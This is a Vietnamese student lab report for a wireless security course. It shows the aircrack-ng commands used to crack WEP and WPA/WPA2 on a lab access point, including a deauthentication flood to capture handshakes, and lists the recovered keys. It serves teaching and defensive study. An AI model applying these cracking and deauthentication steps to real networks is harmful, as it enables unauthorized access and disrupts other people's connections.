Tải bản đầy đủ (.docx) (8 trang)

An toàn mạng không dây và di động: CÁC CHUẨN BẢO MẬT MẠNG KHÔNG DÂY

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (285.94 KB, 8 trang )

Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

BÁO CÁO LAB 3
CÁC CHUẨN BẢO MẬT MẠNG KHÔNG DÂY
Môn học An toàn mạng không dây và di động
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Trang 1 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

I. Bẻ khóa chuẩn bảo mật WEP
1. Yêu cầu 1: Bẻ khóa mật khẩu WEP với độ dài khóa 64bit
B1: Kiểm tra máy đã có card mạng wifi chưa.

B2: Chuyển card mạng sang chế độ giám sát.

Đã chuyển sang chế độ giám sát trên interface wlan0mon.
B3: Xác định AP:

Trang 2 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ


Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

BSSID: A4:2B:B0:FB:B3:F8
Kênh: 9
Mã hóa: WEP
B4: Bắt và lưu gói tin với tên wepcrack.
airodump-ng -c 9 -w wepcrack --bssid A4:2B:B0:FB:B3:F8 wlan0mon
Kết quả:

Hiện đang có một máy kết nối đến AP với MAC: 64:5A:04:8B:FD:9A
B5: Mở terminal mới và tạo chứng thực giả với AP:

Trang 3 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

B6: Đồng thời lúc này ta chạy lệnh sau để tiến hành bẻ khóa WEP
aircrack-ng wepcrack-01.cap
Kết quả: mất 5s để giải mã với key là 123ab

2. Yêu cầu 2: WEP với khóa có độ dài 128bit
a) Mật khẩu đơn giản.
B1, B2, B3, B5 Tương tự như trên
B4: Tạo tập tin mới wepcrack128

B5: Bẻ khóa 128bit
aircrack-ng wepcrack128-01.cap

Kết quả: Mất khoảng 1 phút để lấy được key: 123456789abcd

Trang 4 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

b) Mật khẩu phức tạp.
Các bước tương tự nhau.
Kết quả: Cần 1:19s để lấy được mật khẩu: Ab1@23dD2t#f1

Kết luận: Chuẩn bảo mật WEP không an toàn khi sử dụng, tuy đã tăng độ phức tạp của mật
khẩu nhưng thuật toán mã hóa yếu nên dễ dàng bẻ khóa với thời gian tương đối ngắn.

II. Yêu cầu 3: Bẻ khóa mật khẩu chuẩn WPA/WPA2.
B1: Kiểm tra card mạng wifi đã có chưa.

Trang 5 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

B2: Chuyển card mạng về chế độ giám sát.

B3: Xác định AP:


Trang 6 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

BSSID: A4:2B:B0:FB:B3:F8
Kênh: 9
Mã hóa: WPA
B4: Bắt và lưu gói tin với tên wpacrack.

Sau đó đợi máy nào đó kết nối vào AP. Quá trình kết nối giữa thiết bị và AP trải qua 4
bước bắt tay và khi có dòng WPA handshake thì quá trình này đã hoàn tất. Dừng việc thu
thập dữ liệu (CTRL + C) và làm tiếp B6.

B5: Trong trường hợp đã có thiết bị kết nối với AP trước đó, thì cần đá thiết bị này ra khỏi
AP, để thiết bị đó kết nối lại AP mới có được gói tin handshake. Sử dụng lệnh:
Trang 7 / 8


Báo cáo Lab 3
Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ
Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

aireplay-ng --deauth 30 –a [router bssid] –c [client bssid] wlan0mon
Tham số: --deauth 30 là sử dụng chế độ death và gửi liên tiếp 30 gói deathentication để
làm mất kết nối giữa AP và thiết bị.
--a BSSID của AP
--c BSSID của thiết bị

Cuối cùng là card mạng đang làm việc.
B6: Chạy aircrack để bẻ khóa mật khẩu với từ điển cho trước.

Tham số: -a2 bẻ khóa WPA.
-b BSSID của AP.
-w Đường dẫn tới tập tin chứa mật khẩu.
Cuối cùng là tập tin *.cap chứa những gói tin đã thu thập được.
Kết quả:

Trang 8 / 8



×